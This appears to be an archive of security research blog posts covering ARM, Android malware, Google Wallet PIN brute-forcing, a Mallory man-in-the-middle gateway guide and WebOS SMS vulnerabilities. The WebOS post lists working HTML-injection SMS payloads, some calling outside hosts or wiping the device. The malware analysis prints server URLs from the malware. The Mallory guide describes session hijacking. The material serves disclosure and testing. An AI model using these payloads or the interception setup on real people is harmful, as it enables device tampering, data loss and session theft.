Intrepidus Group
Insight

Author Archives: 0xD1AB10

Raspberry PI: Wheezy And Her Non-Non-Executable Stack (nnx)

Posted: August 8, 2012 – 5:13 pm | Author: | Filed under: ARM, Raspberry Pi

A few weeks ago I was lucky enough to score a Raspberry Pi from bNull. This awesome little device seemed to be the hottest new gadget to add to the haxoring desk. After I reviewed the specs, it’s not hard to see why. The RPi is quite a versatile piece of hardware. A quick check with Google uncovered scores of blogs featuring projects that use the Raspberry Pi. Another, unrelated, check of my RSS feed seemed to suggest that practical ARM exploitation is a pretty important thing. This was enough to covince me that it’s time to teach myself real world ARM exploitation techniques using a Raspberry Pi! However, before I start blogging about that, I’d like to share an interesting discovery that came about while setting up the RPi testbed.

While setting up my test environment I noticed something very interesting. After upgrading my RPi to the new Raspbian Wheezy image from the initial Debian image availble earlier, all my binariers now had an executable stack. The screen shot below shows the memory layout of a simple program I wrote that had a vanilla stack based buffer overflow bug.

Notice that the stack of this process, located at 0xbea31000, had the read, write, and execute permissions applied to it. This was quite a surprise to me, since this very same binary did not have an executable stack when executed on the previous default RPi debian image. So what was changed? And what was this libconfi_rpi library that was loaded into memory?

A quick search revealed that libconfi_rpi was the optimized memcpy and memset library packaged with the Wheezy distribution. It was loaded into memory using /etc/ld.so.preload. Could this be making the stack executable?

Lets step back for a second, why would a stack be made executable? This article sumed it up nicely. Simply put, a stack will be made executable if:

1. GCC generates code that requires an executable stack.
2. ASM source (.s files) explicitly asks for executable stack.
3. ASM source (.s files) is missing a GNU-stack note. (A common bug)

If a binary is complied from source containing one of the above conditions, or loads a shared object that had any of the above conditions during compilation, the process’ stack for that binary will be marked executable. Knowing that my binary previouly had a noexec stack, and this libcofi_rpi.so was now loaded into my memory, I was pretty sure it explicitly asked for an executable stack. In fact, a quick scan of the shared object (below) did in fact reveal that library was compiled to have a RWX stack!

So, now that we found the problem, how do we fix it. Well I pulled down the open source libcofi_pi, and attempted to verify if any of the above conditions were true. Low and behold, the code was written in ARM assembly and does not include the GNU-stack note in either of the two source files. This forced the assembler to create a shared object that requested an executable stack. By adding the note (pictured below, line 336) and recompiling the sources files, the shared object should now require only a read, write stack.

After making the subsequent edits to the sources files and rebuilding the shared object, a quick scan of the elf indicated that the library, did indeed, only require a read, write stack (image below). Simply overwriting the old shared object with this new binary should fix Wheezy eXotic stack.

Rerunning my test server and reviewing its memory layout confirmed that we are now back to a RW stack and ready to learn ARM exploitation on a relatively up to date system.

All of these edits were pushed to the libcofi_rpi project hosted on GitHub. If you have an RPi and want to pull down the new update, I suspect you have to do this manually for now. I am not sure how long this will take to be pushed up to the Debian image.

Comments disabled

Google Wallet coming for iOS?

Posted: March 15, 2012 – 11:42 am | Author: , and | Filed under: android, iOS, Mobile Security, NFC, RFID

The list of two OS types in WalletShared: ANDROID and IOS (click to enlarge)

Let’s start by saying this is no smoking gun, but a pretty interesting case of information leakage through an application. For our regular blog readers, you’ll know we’ve been looking into NFC based applications over the past year. The jewel of all NFC apps is easily Google Wallet and thus we’ve spent a large amount of time trying to understand it. When you decompile an Android application, which isn’t obfuscated, you’re able to see the same class names, method names, variable names, and other identifiers as in the developer’s source code. In this case, Google Wallet includes a package called “wallet.proto” which contains parsers for any “Protocol Buffer” formatted data the application uses. While the name “Protocol Buffers” sounds generic, it’s actually Google’s well-documented mechanism for serializing data (think of it as their version of XML or PLists). If you followed the Google Wallet PIN hashing issue, you’ll remember that the PIN hash is stored in a protocol buffer.

The “WalletShared” protocol buffers package in the current version of Google Wallet contains hints of iOS within the parsers definitions. This includes defining the “DeviceContext -> HardwareType” field with only two values: “ANDROID” and “IOS”. iOS strings are also found in two additional protocol buffers called “IosDevice” and “IosWallet”. The classes only leak a little detail about the information being collected which include items named “appId”, “appVersion”, “walletUuid”, and a few “model” and “version” items.

Function names with "iOS" in the string

Function names with

Now you might ask why anything about an iOS application, written in Objective C, would get compiled into an Android application, written in Java. This could happen because of how a Protocol Buffer structured data definition file is created. A developer typically creates a “.proto” file, which is a programming language independent file which defines the data structure. This “.proto” file is then compiled using the “protoc” application and creates the appropriate files for the language you are programming in. Thus, it’s simple to use the same “.proto” file to create a Java object or an Objective C object if they are both going to use the same data structure. While Objective C is not in the official protocol buffers package, there is an add-on for that language available. Thus it is quite likely if there was a “shared” data structure which both clients and the server would need to parse, the same “.proto” file would be used regardless of the application’s programming language.

Of course, if Google is developing Google Wallet for iOS, it raises numerous questions. Since iOS devices do not currently include an NFC radio or secure element, is Google planning to release a case, or “sleeve,” with these components? Or do they know something about the next iPhone we don’t? And if the next iPhone does have NFC and a Secure Element, would Apple allow Google access to those components? In any case, if Google is working on developing their wallet for iOS, this could be a sign of strong commitment by Google to contactless payment technology. And that’s a win for everyone regardless of which device is in your pocket right now.

Comments disabled

Google Wallet PIN Brute Forcing

Posted: February 9, 2012 – 10:46 am | Author: , and | Filed under: android, Mobile Security, NFC, Tools

Google Wallet is a project of great interest right now as it is a big shift in how we pay for goods and services in the US (Japan is quite far ahead of everyone on mobile payments). Some researchers have discovered that Google Wallet is storing the PIN for your wallet on the device in a relatively insecure format. Since this information was already released into the wild, we felt we should share our perspective and how we would approach this problem. The PIN data is stored in the application’s SQLite database.

The SQLite database is stored in the Google Wallet data directory. Google wallet stores the pin in the proto column of the metadata table. The data is encoded using the protobuf format (also by Google). The following SQL query retrieves the data:

select hex(proto) from metadata where id = "deviceInfo";

This query retrieves the protobuf data encoding a number of device and user specific information. Protobuf is a data serialization format, similar to JSON in concept. Next the data must be deserialized. The standard way to work with protobuf data is to define a .proto file, which acts as a key for deserialization. These .proto files get compiled down to application specific code and are not in their native human readable format. Raj decided to start to write a generic protobuf decoder (Protobuf Easy Decode) . This Python module can decode protobuf data without a .proto file. Some data is inevitably lost when reading raw protobuf data without a .proto file.

Recovering the PIN with the decoded data required some understanding of the specific .proto structure. Once the salt and the hash of the salted pin retrieved, brute forcing the PIN is a trivial matter: brute_pin.py illustrates how to brute force the PIN.

 

@0xd1ab10 and @0xb3nn

1 comment

ARM, Pipeline and GDB, Oh My!

Posted: September 22, 2011 – 12:19 am | Author: and | Filed under: ARM

This post off will start with an important question. Look at Listing 1 below; after executing the instruction located at main+12, what values will be stored in r0 and r1? Take a moment to consider this.

Listing 1: Disassembly of main()

My first (albeit incorrect) answer was that r0 would have 0x000083bc (main+8) stored in it and that r1 would have 0x000083c8 (main+12+8) stored in it (the address of the instruction, plus the value from the add instruction). I thought this because I made a few assumptions about the state of the processor during the execution of the instructions. First, I assumed that while executing the instruction located at main+8, “mov r0, pc“, the pc register would have the address main+8 stored in it and therefore that address would be moved into r0. I also made the assumption that while executing the instruction at main+12, “add r1, pc, #8“, the pc register would have the address of main+12 stored in it and  this address plus 8 would be moved into r1. According to Listing 2, I felt that GDB supported my assumptions by showing the pc register with the currently executing instruction stored in it.

Listing 2: GDB reported pc values before execution of instructions.

By examining r0 and r1 while executing the instruction located at main+16 (Listing 3) it became obvious my two predictions would not come to pass. The r0 register had 0x000083c4 stored in it and the r1 register had 0x000083d0 stored in it. Perplexed, I needed to try to understand the mechanism at work here.

Listing 3: Actual values of r0 and r1

After a few minutes of thinking, I started to remember a topic covered in my NYU:Poly computer architecture class, pipelining. I then noticed that both of the values were exactly 0×8 higher then I expected. Doing a quick Google search, I came across the fact that the ARM processor executing my code has a 3 stage pipeline with a 4 byte fixed instruction size.

To understand this problem, we now have to get into some details of ARM processor architecture. Pipelining, as it relates to a processor, is a term used to describe an optimization to optimize the execution of instructions. When a processor executes one instruction there are normally a few distinct steps required before finally executing it. For example, ARMs pipeline stages include fetch, decode, and execute* (see note at end of post). The processor must first load the instruction from memory (fetch), decipher what the instruction must accomplish (decode), and perform the operations necessary to complete the instruction (execute). Each step usually relates to  a set of components inside the processor and requires a certain amount of time to accomplish. In addition, the steps must performed in a strictly serial manner  per instruction. In a non-pipelined processor only one phase of one instruction is performed at once. This leaves the hardware on the processor responsible for the other stages idle. A pipelined processor is designed to have each phase active for an instruction all of the time.

Let us work through an example (Image 2); during one clock cycle Instruction 1 will be in the execute phase, Instruction 2 will be in decode phase, and Instruction 3 will be in the fetch phase. So why is this important? From a high level point of view, the pc register points to the currently executing instruction. This is the convention that GDB employs.  However, from an ARM pipeline point of view, the physical pc register always points to the instruction currently being fetched. The reason for this resides in the deepest levels of the ARM processor architecture. The pc register is used as a direct input into the address register. The address register is used to index memory used to fetch the instruction. See image 1 below from “ARM system on a chip, second edition” for a good diagram of this.

Image 1: ARM Layout (source: ARM system on a chip, second edition)

Our example image below shows a time based view of this processor over the course of 5 clock cycles. Carefully analyzing image 2 during clock cycle 3, we see that the instruction being fetched is 2 instructions after the instruction being executed. Therefore, within the processor, pc must point 2 instructions after the current executing instruction, or 8 bytes ahead (each instruction is 4 bytes long). Instructions that use the value stored in the pc register will be using this actual value of pc. When we see an instruction such as “mov r0, pc” we can think of this as r0 will get pc + 8 where pc represents the current executing instruction as reported by GDB.

Image 2: Pipeline (Source: http://winarm.scienceprog.com/arm-mcu-types/how-does-arm7-pipelining-works.html)

 

With this in mind, the correct answers to the initial question is:
r0 = 0x000083c4  = (main+8) + 8 = 0x000083bc + 8
r1 = 0x000083d0 = (main+12) + 8 + 8 = 0x000083c0 + 8 + 8 = 0x000083d0.

As you can see, these solutions match what was observed by GDB. Yay!

So what are the key lessons learned?  Depending on the number of stages or the specific hardware, the difference  between the address of the currently executing instruction and the value stored in the physical  program counter register (eip, pc, rip, etc.) may be different. It is important to research this behavior for any processor architecture you are going to be reverse engineering on, writing shell code for, or simply writing assembly to be executed.

-Raj

*Note: There are many different ARM processors and pipeline architectures, however, this is a good description of it to understand the general mechanism at work. 

1 comment

This is not the Android Market Security Tool you are looking for

Posted: March 11, 2011 – 12:46 am | Author: , , , and | Filed under: android, android.bgserv, Cryptography, jailbreak, jailbreaking, Mobile Security

We have been actively following and analyzing the spate of Android malware in the Android Market place. The most recent outbreak to light up the blog-o-sphere has been the Droid Dream outbreak. Google’s response to this was to launch a search and destroy mission. They created and pushed a tool to all handsets that were infected with Droid Dream. The Android Market Security Tool (AMST) was pushed to devices that were known to have downloaded and installed infected applications. This tool disinfects the compromised handsets by eradicating all remnants of the Droid Dream trojan. However, what we found quite interesting, is that shortly after the release of AMST, a trojaned version of the AMST appeared and is making the rounds on the internet! (Yo dawg…)

Symantec performed an initial analysis on this piece of malware. They found some interesting links between the malware and a hosted Google code project. This sparked our interest and we decided to get a sample of this malware and perform our own analysis.

The first obvious difference is that the application is requesting very different permissions from the official Google tool, including the ability to change network settings and perform actions, such as send and receive SMS, which can be used fraudulently.

This image illustrations the permissions the application is granted. In particular it is allowed to change the network state, a fact which becomes important when coupled with some of the capabilities of this malware, which we will discuss shortly. The features of this malware are almost identical to the Fake 10086 malware, which has been previously analyzed. When we looked at the disassembled version of the fake AMST, it does appear to be extremely similar to the code found on this Google Code repository. Keep in mind this is malware targeting Android devices using Google’s own code hosting repository system to keep track of the malware development.

So what does this opensource malware do? One thing it does is change your Wireless Application Provider server and your APN. The capture below shows the Java version of this code doing that:

How this capability is used is unclear, but the fact that it is setting your APN, which is essentially where you access the Internet from on the carrier network, is a bit troubling. Additionally, the application has the ability to intercept SMS messages by abusing the RECEIVE_SMS permission. It uses this to filter out SMS from certain numbers so that the malware can receive SMS messages that the user is never aware of. The application then responds and takes some actions based on that SMS. Again, here is the Java code for clarity:

Another interesting feature of this malware is that it hooks the phone call receiver. On any phone call the phone receives it looks for two specific numbers, “10086″ (hence the name Fake 10086 of this Malware’s variant) and “10010″. Both of those numbers are associated with Chinese telecom carriers. The main purpose of all of these lovely “features” is to prevent the user from receiving support related to this malware and keep it on there. The main purpose of the malware is to message a “vedio” service, err, “video” service and rack of SMS text changes. The capture below illustrates some of the URLs and VEDIO love.

private static final String CMWAP = "cmwap";
public static final String CMNET = "cmnet";
// private static final String SERVER_URL = "http://go.ruitx.cn/Coop/request3.php";
private static final String SERVER_URL = "http://www.youlubg.com:81/Coop/request3.php";
// private static final String VEDIO_URL = "http://211.136.165.53/wl/rmw1s/pp66.jsp";
private static final String VEDIO_URL_REAL = "http://211.136.165.53/adapted/choose.jsp?dest=all&chooseUrl=QQQwlQQQrmw1sQQQpp66.jsp";
private static final Uri uri_apn = Uri.parse("content://telephony/carriers/preferapn");private static final Uri uri_apn_list = Uri.parse("content://telephony/carriers");

Seems pretty ballzy to have the malicious source code posted on a Google Code repository, so we wanted to know more about this aspect. While the author seems to have worked on a few other projects, “mmsbg” seems to be the only thing updated by this account on Google Code recently. We had to wonder what type of jokes this guy would put in the signature that signed the trojaned APK file. A quick “keytool -printcert” of the CERT.RSA file is listed below. Notice the “EMAILADDRESS=lorenz@londatiga.net“.

Let’s see what is up at londatiga.net. Seems to be an Android developer with some APK files posted. Wonder what cert was used to sign the “AnReboot Widget” package which you can download from the site.

Notice the matching fingerprints (the MD5 and SHA1 lines). Looks like both the malware sample and the “AnReboot Widget” posted on the Londatiga site are signed with the same private key. What are the chances of that…  we thought.  Turns out Lorenz dropped a private key in a tutorial blog post on signing Android applications and then used it for this app (although his Android Market apps are signed with a different key). Anyhow, it is a good reminder that they’re called “private” keys for a reason. Might be time to generate a new one if you are using ones that have been downloaded by others.

Another point of interest are the whois results for the IP address in the malware:


inetnum: 211.136.96.0 - 211.136.191.255
netname: CMNET-shanghai
descr: China Mobile Communications Corporation - shanghai company
country: CN
admin-c: HL888-AP
tech-c: HL888-AP
mnt-by: MAINT-CN-CMCC
mnt-lower: MAINT-CN-CMCC-shanghai

The malware makes HTTP posts to this address. One final point we will raise is that the malware can also sets the user’s APN to a CMNET APN.

Regardless of the true intent of this malware, the malware authors of the world have clearly struck the first blow in the mobile malware war. This will be a fascinating space to watch as the collision of malware, personal data and mobile devices occurs.

@bitexploder, benn, jross, sid and DIAB1069

Comments disabled

The Secret is Out: WSJ on Mobile Application Privacy

Posted: December 20, 2010 – 10:57 am | Author: | Filed under: android, Articles, iOS, jailbreak, Mobile Security

Good morning! Like many of us, my morning includes a warm cup of coffee, working my way through some E-Mails, and skimming through the blogosphere. About halfway though this ritual I came across one very interesting piece by the Wall Street Journal.  To call this article a simple blog post doesn’t do it justice. This story is the result of countless hours of mobile application analysis. The WSJ worked with our friends at Electric Alchemy to perform an in-depth study on how some of the most popular Android and iOS apps (protect) disregard our privacy. During this study, Electric Alchemy found that you cannot count on mobile applications to “keep your secrets”. It was found that over half the apps tested transmitted data that could uniquely identify your device, a little less then half sent out some form of location data, and a small number even sent out personal information such as name and gender. The WSJ created an interesting and interactive portal to analyze their findings.  It’s nice to see a piece like this use so much visualization.

It was also nice to see our tool Mallory was used during part of the analysis. We hope to see more uses of Mallory like this and are committed to keeping it updated and maintained.  Once again, our hats off to EA and the WSJ. Well done!

Cheers,

Raj Umadas

Comments disabled

Mallory and Me: Setting up a Mobile Mallory Gateway

Posted: December 15, 2010 – 8:48 pm | Author: | Filed under: Mobile Security, Tools

Over the past few months, we have put Mallory through its paces. Scores of mobile applications have had their network streams MiTMd by Mallory. It has become one of a few important tools that we use on a daily basis. Because we use it so often, we sometimes forget that it may seem quite difficult to get up and running for the first time. Mallory is still actively developed. Improving the user experience from the initial code checkout to helping users “Mallorize” traffic is a key goal for the project. However, until then, this howto guide will suffice to get Mallory up and running for your testing needs.

This guide will explain how to get Mallory up and running (in this guide I use an EeePC). I also use a tethered Android device for a WAN connection, and have MiTM victims connect to the netbook over its WiFi connection. I will also be sharing how we use a tool called hostapd to make our EeePC look like an infrastructure mode WiFi access point, as opposed to an Ad-Hoc WiFi access point. Using this guide, you should be able to set up a mobile Mallory gateway in no time.

Step Zero: The Gear.

For this guide I will be using my EeePC 1000HE with Ubuntu 10.04 LTS installed on it as the reference design. Many netbooks/OS/WiFi card combos should work. I will also be using my Nexus One handset running Cyanogen Mod to provide the WAN connection. Feel free to leave comments below on your setup.

Step One: Downloading the dependencies.

The first step is to install the required libraries and packages required to run Mallory. The below apt-get commands should pull down and install all dependencies that are hosted by Ubuntu’s repositories. You can copy and paste the below apt-get commands into your terminal, and download all the dependencies at once. (Note that the last two packages are used for pre-packaged Mallory plug-ins. The paramiko package is used to MiTM SSH connections, and the imaging package is used to manipulate images within an HTTP response)

sudo apt-get install mercurial;
sudo apt-get install python-pyasn1;
sudo apt-get install python-netfilter;
sudo apt-get install libnetfilter-conntrack-dev;
sudo apt-get install python2.6-dev;
sudo apt-get install python-setuptools;
sudo easy_install pynetfilter_conntrack;
sudo apt-get install netfilter-extensions-source;
sudo apt-get install libnetfilter-conntrack3-dbg;
sudo apt-get install python-paramiko;
sudo apt-get install python-imaging;

You will also need to download and install the netfilter connection tracking package. We have tested Mallory with the below version of the package. We recommend using the below versions until we can confirm that an up to date version of the package is compatible with Mallory.

If you are installing Mallory on a 32-bit system, you will need to download the following package:

#If you are installing Mallory on a 32 bit machine
wget http://ubuntu.cs.utah.edu/ubuntu/pool/universe/libn/libnetfilter-conntrack/libnetfilter-conntrack1_0.0.99-1_i386.deb
sudo dpkg -i libnetfilter-conntrack1_0.0.99-1_i386.deb
#endif

If you are installing Mallory on a 64-bit system, you will need to download the following package:

#if you are installing Mallory on a 64 bit machine
wget http://ubuntu.cs.utah.edu/ubuntu/pool/universe/libn/libnetfilter-conntrack/libnetfilter-conntrack1_0.0.99-1_amd64.deb
sudo dpkg -i libnetfilter-conntrack1_0.0.99-1_amd64.deb
#endif

Step Two: Downloading and Installing hostapd

Before we start pulling down the Mallory code base, it is helpful to take a step back and install and configure hostapd. This step is not required for Mallory to run as a mobile gateway. (One can always set up an ad-hoc WiFi network.) To intall hostapd, run the following apt-get command:
sudo apt-get install hostapd

After installing hostapd, we need to setup the configuration file to get it up and running. The configuration file can be found at /etc/hostapd/hostapd.conf. Below is a sample of the configuration file I use. I only present the parameters that I changed. All other parameters were kept in their default state. Use your favorite editor to make the required changes.

# AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for
# management frames); ath0 for madwifi<
interface=wlan0

# Driver interface type (hostap/wired/madwifi/prism54/test/none/nl80211/bsd);
# default: hostap). nl80211 is used with all Linux mac80211 drivers.
# Use driver=none if building hostapd as a standalone RADIUS server that does
# not control any wireless/wired driver.
driver=nl80211

# SSID to be used in IEEE 802.11 management frames
ssid=TestNet

# Static WEP key configuration
# The key number to use when transmitting.
# It must be between 0 and 3, and the corresponding key must be set.
wep_default_key=0

# The WEP keys to use.
wep_key0=AAAAA11111

Users with other WiFi cards, or drivers, might have to experiment with the “driver” and “interface” parameter. Internet searching for your specific card and driver should return a number of tutorials on getting hostapd running for your box. Again, please leave comments below with hostapd configuration settings for specific setups.

Step Three: Getting Mallory

Now that we have mercurial installed (Step One^) we can use the hg command to pull down the Mallory code base. Navigate to the directory where you want to download the Mallory code base and run the following command.
hg clone http://bitbucket.org/IntrepidusGroup/mallory
It should look something like this:

Step Four: Setting up the Gateway

We now have all the required code, packages, libraries, and mythical creatures in place to start Mallorizing victims (the leprechauns, fairies and ground unicorn horn came preinstall in 10.04). For pedagogical purposes, starting Mallory will be a two step process. It is important to understand that Mallory runs on a gateway, it is not a gateway in and of itself. Therefore we need to make sure our netbook is acting as a gateway for the clients before we start Mallory. This will ensure that any misconfigurations get caught early and are easy to trouble shoot.

Using the script below, your netbook will be converted into a lean mean routing machine. You will need to run this script as root. When prompted, you will need to enter the interface for the WAN and LAN link. For my setup, my tethered android handset provides internet connectivity to the netbook. This is done via interface usb0. Therefore usb0 will be my WAN link. The WiFi interface servicing the clients will be on wlan0. Therefore, wlan0 is my LAN interface. When prompted, the WAN link is usb0 and the LAN link is wlan0. You will need to use the approprite links for your setup. For example, if you are using an ethernet connection to obtain access to the internet, the WAN interface could be eth0.

#!/bin/sh
echo "Wan Interface: "
read wanInt
echo "Wifi Interface: "
read lanIn

echo "Stopping network manager"
/etc/init.d/NetworkManager* stop
echo "Stopping dnsmasq"
/etc/init.d/dnsmasq stop
echo "Bringing down lan interface"
ifconfig $lanInt down
echo "Starting hostapd"
hostapd -B /etc/hostapd/hostapd.conf
echo "Applying configs to lan interface"
ifconfig $lanInt 10.0.0.1 netmask 255.255.255.0
echo "Starting DHCP server"
dnsmasq --no-hosts --interface $lanInt --no-poll --except-interface=lo --listen-address=10.0.0.1 --dhcp-range=10.0.0.10,10.0.0.100,60m --dhcp-option=option:router,10.0.0.1 --dhcp-lease-max=50 --pid-file=/var/run/nm-dnsmasq-wlan0.pid

echo "Stopping firewall and allowing everyone..."
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

echo "Turning on Natting"
iptables -t nat -A POSTROUTING -o $wanInt -j MASQUERADE
echo "Allowing ip forwarding"
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "Adding 4.2.2.1 to resolv.conf
echo "nameserver 4.2.2.1" >> /etc/resolv.conf
echo "GO GO gadget gateway"

After executing this script, you should be able to connect clients to our newly created WiFi network. This would also be a good time to test that the clients have internet connectivity. If this test fails, some trouble shooting is in order.

Things to double check would be:

  • Did you run the script as root (sudo)
  • Can the gateway get out to the internet (ping)
  • Does the LAN interface have an IP (ifconfig)
  • Is the DHCP server running (ps)
  • Are the DNS servers configured properly (cat /etc/resolv.conf)

Troubleshooting this step is slightly outside the scope of the post, however feel free to leave comments about any difficulties and we can try to help out.

Step Five: Starting Mallory

So we have our equipment, we downloaded the dependencies, we configured our conf files, and we had a short lesson on how to setup an Ubuntu gateway…sounds like its Mallorizing time. All that is left is to start Mallory and force our gateway to funnel all network streams into Mallory’s one listening socket. The iptables commands below will tell our gateway to forward all TCP and UDP streams originating from our lan (wlan0) into a local socket listening on port 20755. This is the port that Mallory is configured to listen on.

sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp -m tcp -j REDIRECT --to-ports 20755
sudo iptables -t nat -A PREROUTING -i wlan0 -p udp -m udp -j REDIRECT --to-ports 20755

To start Mallory we need to run mallory.py as root. (Note: Mallory is not backdoored) This python file is located in the mallory/src directory. The command below should start Mallory as root.

sudo python ./mallory/src/mallory.py

After you run the above command, Mallory should be up and running. To test this out, connect a client to Mallory and visit an image heavy website. By default Mallory is configured to have the HTTP module enabled with the HTTP image flipping and image color inverting plugins enabled. You should see something like this (notice the two images are upside down and their colors are inverted).

By default Mallory is also configured to run the cookie hijacking plugin. Using the Mallory Cookie Editor plugin for chrome, you can copy a cookie captured by Mallory and apply it to your browser with one click. This would allow you to session hijack any HTTP session flowing through Mallory. If HTTPS MiTMing is turned on, sessions “secured” by HTTPS could be hijacked as well (provided the users click through the cert warnings). The Chrome plugin needs to run in a Chrome browser on the Mallory gateway itself. Below, you can see an example of the Mallory Cookie Editor for Chrome.

Step Six: What is next?

We have tcp streams flowing through Mallory, we see images being manipulated, and we are hijacking sessions of popular websites: what’s next. Well, Mallory, first and foremost is a testing tool. There is a variety of functionality in Mallory that can be unlocked with a few lines of code and configuration data. For example, MiTMing SSL streams of data, pausing and editing streams of data using the mallory graphical TCP stream debugger, quickly writing data manipulation routines that can automatically operate on streams of HTTP data (also controllable on the fly in the mallory GUI). All of this (and more) can easily be done with Mallory. In the near future, we will be posting tutorials on how to accomplish many tasks with Mallory. However, before we get there, this is the first step that must be completed. Once you have your setup that can flip images, you can start to dive head first into the world of Mallory!

-D1AB1069-

21 comments

WebOS: Examples of SMS delivered injection flaws

Posted: April 16, 2010 – 2:59 pm | Author: | Filed under: Mobile Security

(Note: the findings herein affect WebOS 1.3.5. Palm has since released WebOS 1.4, which fixes these vulnerabilities, though not all handsets or carriers are running this version. Due to contractual agreements, the public disclosure of this information was delayed.)

Intrepidus Group has been doing mobile application security testing for over three years now, and during this time we’ve discovered and responsibly disclosed a number of vulnerabilities in Brew, Windows Mobile, BlackBerry, and iPhone applications. We have been contracted time after time to perform threat modeling, penetration testing, and various other security assessments on these platforms. So, as any one would expect, we were all looking forward to have a glance at Palm’s new WebOS platform.

While closely following the blogosphere around WebOS and reading documents released by Palm, we started to understand the revolutionary paradigm shift that Palm was attempting with WebOS. A mobile platform that functions like a web browser; a platform whose applications are written in JavaScript and HTML; and an API reference so simple that anyone reasonably familiar with web application programing could create the next revolutionary social media app in no time.

When a customer shipped us our first PRE devices to test their application, we spent spare cycles exploring the rest of WebOS. Our initial impressions were quite positive. There was just so much to love: Linux underneath, the platform’s open nature, the user interface, and the hardware. There was just so much to love. However, the honeymoon ended abruptly once we started to explore WebOS’s security posture.

As we started to pry a little it became quite apparent that Palm’s new WebOS platform was riddled with some pretty dangerous bugs. These bugs can all be traced back to that fact that WebOS is essentially a web browser and the applications are written in JavaScript and HTML. This also means that WebOS applications are subject to the numerous web applications vulnerabilities that any seasoned penetration tester would be all too familiar with. We were also quite surprised at how quickly these vulnerabilities were discovered. Within a matter of hours we started to uncover a number of low-hanging-fruit vulnerabilities that would be considered quite dangerous under even the most forgiving of standards.

We understand, of course, that there are a number of competing interests that go into the development of a new mobile platform. There are demands from share holders to get this product completed as quickly as possible. There are requirements from developers to make application development as easy as possible. There are requirements from manufacturers to make this product as cheap as possible. And there are requirements, by the (often not so popular) security oversight team, to make this product as safe as possible. We obviously do not expect Palm to focus on making the most secure of mobile platforms due to all of these competing interests. However, we feel that Palm put almost no thought into security during their development of WebOS. All of the low hanging fruit discovered should have been identified in the most basic of threat models, which should have been performed during the very early development stages of WebOS, way before any code was written. If they were, then we would imagine that slight changes to the underlying architecture of WebOS could have been implemented to protect against common web application vulnerabilities that are found in WebOS applications. Or, at the very least, common web application vulnerabilities would not have surfaced in WebOS applications written by Palm themselves.

So what vulnerabilities are we talking about? What was uncovered after a few hours of poking around? The WebOS SMS client wasn’t performing input/output validation on any SMS messages sent to the handset. This lead to a rudimentary HTML injection bug. Coupled with the fact that HTML injection leads directly to injecting code into a WebOS application, the attacks made possible were quite dangerous (especially considering they could all be delivered over a SMS message). We have produced a video demonstrating some of these possible attacks.

In this video a number of text messages were sent to the device. Leveraging the HTML injections, and some innate WebOS functionality, we were able to perform actions ranging from opening up a website by simply reading an SMS to turning off the hand set’s radio. Below is a list of the text messages we sent as well as the action they performed.

<iframe src='http://www.google.com'<>>Open the web browser and point it to google.com

<iframe src='http://webos.ath.cx:50050/bad.doc'<>>Start downloading a file using the handsets full radio bandwidth

<iframe src='http://www.archive.org/download/Peanut_Butter_Jelly_Time/pbj_512kb.mp4'<>>Start streaming a video from the internet

<iframe src='http://rajweb.net/ubercert.crt'<>>Ask the user to install a new root CA certificate

<iframe src='tel:#*#633#'<>>Turn off the handset’s radio

<iframe src='tel:#*#3366#'<>>Ask the user to enter “demo” mode, erasing all personal data on the device.

This only focuses on the SMS client of WebOS for this demonstration. The HTML injection bug may be present in a number of WebOS applications. Any app installed via the market place (even other Palm developed apps) may be vulnerable to this or other common web applications vulnerabilities. We hope that by seeing these attacks in action, WebOS application developers will know what kind of defenses they must code into their applications. We hope that by raising awareness of this threat, users will be aware of the dangers their WebOS applications can present, and that product managers will insist on security assurance testing before their offering goes live.

47 comments

Digital Sampling Theory to the Rescue!!!

Posted: February 12, 2009 – 3:22 pm | Author: | Filed under: Conferences

Hello everyone, I’m Rajendra Umadas, the newest member of the Intrepidus team. I joined Intrepidus not too long ago and I’m loving every second of it. We just came back from ShmooCon, which was my first security conference. Shmoo was a great experience, and I’m excited to attend further cons. While a few of the talks were pretty informative, one in particular I found very interesting. Michael Ossmann and Dominic Spill spoke about how one can build an all channel Bluetooth monitor. Their approach towards solving this problem was ingenious. Quite honestly, any hack that allows us to capture data flows that were otherwise private is awesome. If this hack relies on a basic theory of digital signal processing (I’ll get into that later) as well as the normal security concepts we are all well aware of, it becomes that much more interesting. This Bluetooth presentation had all of those traits.

I don’t plan on reproducing the presentation since you can find that online, however, I do want to talk about what I believed was an interesting solution to a problem that they ran into. But before I can get into the solution I need to introduce the problem.

Bluetooth operates within a 79 MHz bandwidth. It uses 79 channels, each of which is 1 MHz wide. The devices randomly hop around the 79 MHz bandwidth 1600 times a second. All devices that are in a Bluetooth network (piconet) know the hopping pattern and listen to the right frequency at the right time. Ossmann and Spill were able to reverse out the hopping pattern of a piconet by passively listening to 25 channels of communication using their USRP (a tool used to help create software radio implementations.) Their USRP can sample a 25 MHz bandwidth and pass all the data to a computer for processing. They also developed a few scripts that can reverse out the hop sequence by looking at a fraction of a piconet conversation.

Once the pattern is discovered, monitoring a Bluetooth stream can go in one of two directions. You can sniff one channel at a time and retune the radio per hop, or you can record all 79 channels and parse out the correct channels in the DSP software. Both of these paths have some limiting factors. The first, retune per hop, cannot be done with the USRP. Retuning the 2.4 GHz card in the USRP cannot happen 1600 times a second, and therefore cannot hop as fast as the Bluetooth devices. One suggestion then was to bootstrap a Bluetooth dongle with the correct hop sequence and let it do the sniffing. But if we are going to spend thousands on a USRP we damn well want to keep using it. The second solution entails listening to all 79 channels, which would require 4 USRPs. However, buying 4 USRPs is 4 times harder than buying one. We need to find a cheaper way. Digital sampling theory to the rescue!

Using a principle called aliasing, Ossmann and Spill were able to turn their 25 MHz bandwidth USRP into one that can sample 79 MHz! Aliasing is a term used to describe the phenomena when two distinct analog signals create the same digital representation when they are sampled at a certain frequency. This is because at the points where the two signals are sampled, they also intersect each other. Refer to figure one below. The two analog signals are obviously different frequencies, however, if they are sampled at the blue points their digital representation would be identical. Usually this is a phenomena radio designers try to eliminate from their systems. This is because they need to read only one frequency, and the alias frequency would just add noise to the desired signal. Therefore many designs use band-pass filters to isolate one central frequency and eliminate the alias before sampling.

Figure 1. Aliasing in action.

Figure 1. Aliasing in action.

